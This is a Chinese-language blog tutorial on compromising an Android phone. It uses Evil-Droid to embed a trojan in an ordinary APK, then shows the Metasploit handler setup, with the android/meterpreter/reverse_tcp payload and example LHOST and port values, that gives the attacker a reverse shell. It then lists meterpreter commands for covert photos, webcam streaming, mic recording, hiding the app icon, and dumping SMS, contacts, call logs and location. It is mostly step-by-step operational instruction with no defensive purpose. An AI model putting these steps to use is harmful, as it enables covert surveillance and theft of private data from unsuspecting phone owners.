kali 通过app渗透 android

一 、目标

1，实现简单的android渗透，理解原理。
2，可以获取目标手机的内容

二、准备材料

1，kali虚拟机 (我的是2020.4版)
2，手机模拟器
3，Evil-Droid-master（可自己去github下载）
4，一个小app安装包（test.apk）

三、开始

将材料放到kali里面，如下图

更换apktool.jar版本，默认2.3（至少为2.4，自己到网上找吧）

开始搞事情
切换目录

cd Evil-Droid-master

切换到root状态下

su root

安装zipalign库（安装过就不用了）

apt-get install zipalign

授予文件运行权（之前搞过就不用了）

chmod +x evil-droid

运行

./evil-droid    

出现下面的即为成功，如有爆红，就是没有安装相应的包，一路确认安装即可

点击“是”

输入“3”

输入您的IP，记住您的IP，之后有用

随便输入一个端口，但是要记住，之后有用

设置生成的木马apk的名字

选如图

选要植入木马的apk

接下来，一直等…
突然想到：kali学的好，局子蹲到老，hhhh

出现下面这样就算成功。

看一下apk路径，点击确定

按图操作

启动msfconsole

msfconsole

设置监听
下面的要一行一行的执行

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.54 //你的ip
set LPORT 4444  //你的端口
exploit

找到木马apk，安装在android里面

其实就是“一个木X”app，他的功能可以正常用，但是一旦运行，我们的木马也自动运行

双击运行

好了，在kali里面可以对这个手机操作了，具体操作看下面命令

	webcam_list  //列出网络摄像头
	
	webcam_stream //开启摄像头
	
	webcam_snap //隐秘拍照功能

    record_mic [ˈrekərd] /记录/  从默认麦克风录制音频为X秒

    webcam_chat  开始视频聊天

    webcam_snap  从指定的摄像头获取快照

    webcam_stream -i 1  从指定的网络摄像头播放视频流[选择后摄像头]

	Android Commands
	
	=================

    activity_start  从URI字符串启动Android活动

    check_root  检查设备是否有根

    dump_calllog  获取调用日志

    dump_contacts  获取联系人列表

    dump_sms  获取短信

    geolocate  利用地理定位获取当前LAT

    wlan_geolocate  利用WLAN信息获取当前LAT

    hide_app_icon  从发射器隐藏应用程序图标

    interval_collect  管理区间收集能力

    send_sms  从目标会话发送短消息

    set_audio_mode

    sqlite_query  从存储库查询SQLite数据库

    wakelock  启用/禁用Wakelock

	可以输入?查看更多命令

四、总结

kali学的好，局子蹲到老，hhhh